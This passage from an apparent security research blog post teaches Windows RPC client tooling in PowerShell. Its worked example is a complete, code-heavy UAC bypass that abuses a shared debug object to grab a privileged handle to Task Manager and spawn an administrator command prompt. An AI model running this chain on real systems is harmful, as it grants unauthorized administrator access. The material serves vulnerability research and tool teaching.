<InterfaceId>201ef99a-7fa0-444c-9399-19ba84f12a1a</InterfaceId>
<InterfaceMajorVersion>1</InterfaceMajorVersion>
<InterfaceMinorVersion>0</InterfaceMinorVersion>
<Procedures>
<NdrProcedureNameData>
<Index>0</Index>
<Name>RAiLaunchAdminProcess</Name>
<Parameters>
<NdrProcedureParameterNameData>
<Index>10</Index>
<Name>ProcessInformation</Name>
</NdrProcedureParameterNameData>
</Parameters>
</NdrProcedureNameData>
</Procedures>
<Structures>
<NdrStructureNameData>
<Index>0</Index>
<Members/>
<Name>APP_STARTUP_INFO</Name>
</NdrStructureNameData>
<NdrStructureNameData>
<Index>2</Index>
<Members>
<NdrStructureMemberNameData>
<Index>0</Index>
<Name>ProcessHandle</Name>
</NdrStructureMemberNameData>
</Members>
<Name>APP_PROCESS_INFORMATION</Name>
</NdrStructureNameData>
</Structures>
</RpcServerNameData>

If you save the file to names.xml then you can apply it to the RPC server object using the following code:

Get-Content "names.xml" | Set-RpcServerName $rpc

Step 4: Create a client object based on the RPC server. This does a few things under the hood: it generates a C# source code file which implements the RPC client, then compiles that C# file into a temporary assembly, and finally it’ll create a new instance of the client object. The RPC client isn’t connected at the moment, it just implements the exposed functions and the code to marshal parameters. If you want to inspect the generated C# code you can also use the Format-RpcClient function.

$client = Get-RpcClient $rpc

Step 5: Connect the client to the Local RPC server ALPC port. As the UAC RPC server uses the RPC Endpoint Mapper we don’t need to know the name of the ALPC port, it can be automatically looked up. Usefully this process will also auto-start system services if the service has been registered with a specific start trigger, which is the case for the APPINFO service.

Connect-RpcClient $client

Step 6: Define a PowerShell function to wrap the call to the RAiLaunchAdminProcess method. This will make it easier to call, especially when we need to do it multiple times. We’ll pass the DEBUG_PROCESS flag to process creation but make it optional whether to elevate the process or not. The function will return a NtProcess object which can be used to access the properties of the created process including the debug object. Note that when calling RAiLaunchAdminProcess the outbound parameters such as ProcessInformation have been converted to a return structure. This is a convenience for PowerShell use and can be disabled if you really want to use out and ref parameters.

function Start-Uac {
Param(
[Parameter(Mandatory, Position = 0)]
[string]$Executable,
[switch]$RunAsAdmin
)

$CreateFlags = [NtApiDotNet.Win32.CreateProcessFlags]::DebugProcess -bor `
[NtApiDotNet.Win32.CreateProcessFlags]::UnicodeEnvironment
$StartInfo = $client.New.APP_STARTUP_INFO()

$result = $client.RAiLaunchAdminProcess($Executable, $Executable,`
[int]$RunAsAdmin.IsPresent, [int]$CreateFlags,`
"C:\", "WinSta0\Default", $StartInfo, 0, -1)
if ($result.retval -ne 0) {
$ex = [System.ComponentModel.Win32Exception]::new($result.retval)
throw $ex
}

$h = $result.ProcessInformation.ProcessHandle.Value
Get-NtObjectFromHandle $h -OwnsHandle
}

Step 7: Create a non-elevated process and capture the debug object. It doesn’t matter what process we create here, notepad is as good as any. Once we’ve got the debug object we need to detach the process from the debugger otherwise we’ll get mixed messages from this and the elevated process when we wait for debug events. Also without detaching the process will not actually terminate.

$p = Start-Uac "c:\windows\system32\notepad.exe"
$dbg = Get-NtDebug -Process $p
Stop-NtProcess $p
Remove-NtDebugProcess $dbg -Process $p

Step 8: Create an elevated process, in this case pick an auto-elevated application such as the Task Manager. We’ll find the debug object assigned to the elevated process is the same as the one we captured in step 7, unless we’re unlucky and another thread serviced the RPC request, we’ll ignore that for now. At this point we now issue a wait on the debug object to get the initial process creation debug event from which we can extract the privileged process handle. Note that the handle returned in the initial debug event isn’t fully privileged, it’s missing PROCESS_SUSPEND_RESUME which prevents us from being able to detach the process from the debug object. However we do have PROCESS_DUP_HANDLE access so we can get a fully privileged handle by duplicating the current process pseudo-handle (-1) from the elevated process using Copy-NtObject.

$p = Start-Uac "c:\windows\system32\taskmgr.exe" -RunAsAdmin
$ev = Start-NtDebugWait -Seconds 0 -DebugObject $dbg
$h = [IntPtr]-1
$new_p = Copy-NtObject -SourceProcess $ev.Process -SourceHandle $h
Remove-NtDebugProcess $dbg -Process $new_p

Step 9: The $new_p variable should now contain a fully privileged process handle. One quick way to get arbitrary privileged code executing is to use the handle as the parent process for a new process. For example the following will spawn a command prompt as admin.

New-Win32Process "cmd.exe" -ParentProcess $new_p -CreationFlags NewConsole

That’s the end of the worked example. Hopefully it gives you enough information to get up to speed with the tooling and to use it effectively in PowerShell.
Using RPC Clients from C#
To finish this blog post, I just wanted to highlight how you’d go about using this tooling from C# rather than PowerShell. The simplest way of getting a C# file to compile is to use the Format-RpcClient command in PowerShell or the RpcClientBuilder class from C# to generate it from a parsed RPC server. In PowerShell it’s trivial to parse multiple executables in a directory then generate clients for every server using the following example which parses all system32 DLLs and generates individual C# files in the output path:

$rpcs = ls "c:\windows\system32\*.dll" | Get-RpcServer
$rpcs | Format-RpcClient -OutputPath "cs_output"

You can then take the C# files you want and add them to a Visual Studio project, or manually compile them. You will also need to pull in the NtApiDotNet library from NuGet to get the general Local RPC client code. It should even work in .NET Core, although obviously it won’t work on any platform but Windows.

To use a client you can write the following C# code. The using statement depends on the Interface ID and version of the RPC server.

using rpc_201ef99a_7fa0_444c_9399_19ba84f12a1a_1_0;

Client client = new Client();
client.Connect();
client.RAiLaunchAdminProcess("c:\windows\system32\notepad.exe", ...);

There’s a few additional options you can pass to Format-RpcClient to change the generated output, such as specifying the namespace and client name as well as options to return the out parameters in a structure as used in PowerShell. As generating all clients is somewhat time consuming, especially if you wanted to do it for all supported versions of Windows and you wanted to resolve public symbols for names, I’ve done it for you. The WindowsRpcClient project on Github has pre-generated clients for Windows 7, Windows 8.1 and Windows 10 1803, 1903 and 1909. As the code is automatically generated it doesn’t have any specific license, although you’ll need to use the NtApiDotNet library as well.